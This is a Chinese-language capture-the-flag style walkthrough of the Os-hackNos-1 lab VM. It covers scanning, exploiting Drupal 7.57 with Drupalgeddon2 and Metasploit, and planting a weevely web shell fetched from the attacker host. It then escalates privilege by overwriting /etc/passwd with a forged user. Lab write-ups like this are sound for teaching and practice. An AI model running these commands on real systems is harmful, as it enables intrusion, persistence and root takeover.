Os-hackNos-1靶机

实验主机

靶机:192.168.9.43
kali Linux:192.168.9.16
实验网络:桥接网络

信息收集

查看kali的IP地址

ifconfig

在这里插入图片描述

在kali上主机发现

命令:nmap -sP 192.168.9.0/24

在这里插入图片描述

搜索到靶机的IP地址为192.168.9.43
我们进行端口扫描

命令:nmap -A -v 192.168.9.43

在这里插入图片描述

发现22端口和80端口开着
然后我们在浏览器上访问80端口192.168.9.43
在这里插入图片描述

下面进行目录遍历

命令:dirb http://192.168.9.43

在这里插入图片描述

发现http://192.168.9.43/drupal/profiles/minimal/目录下的minimal.Info文件里drupal版本号为7.57
在这里插入图片描述

然后我们在百度搜索一下,打开第二个链接
在这里插入图片描述

接下来我们就需要下载这个脚本并运行拿到网站的WEBshell
下载地址:https://github.com/dreadlocked/Drupalgeddon2

获取目标网站的WEBshell

在kali中下载

git clone https://github.com/dreadlocked/Drupalgeddon2

在这里插入图片描述

安装依赖包

gem install highline

在这里插入图片描述运行这个安装包

./drupalgeddon2.rb http://192.168.9.43/drupal/

在这里插入图片描述
在这里插入图片描述

连接上shell之后,发现权限太小,我们进一步提权

权限维持

创建小马

weevely generate niu ./703.php

在这里插入图片描述
在这里插入图片描述

下载创建的小马

wget http://192.168.9.16:8080/703.php

在这里插入图片描述

连接成功

weevely http://192.168.9.43/drupal/703.php niu

在这里插入图片描述

提权

下面我们伪造一个用户,把它添加到靶机的passwd文件
在靶机的etc目录下把passwd文件下载到本机

file_download passwd /root/桌面/passwd

在这里插入图片描述

把密码生成md5,我的密码是niu,用户名也是niu

openssl passwd -1 -salt salt niu

在这里插入图片描述

然后把生成的md5码
添加在下载的本机的passwd文件最后一行 在这里插入图片描述

下面把靶机的passwd替换掉

wget http://192.168.9.16:8080/passwd -O passwd

在这里插入图片描述

然后用msf5
进入msf5

 msfconsole
 search drupal

在这里插入图片描述

使用第四个,进入到第四个模块

 use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

修改rhosts:靶机地址
targeturi 修改为/drupal

show options
set rhosts 192.168.9.43
set targeturi /drupal
run

在这里插入图片描述
在这里插入图片描述

shell
pyhon3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

切换用户

su niu

在这里插入图片描述

OK 提权成功

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值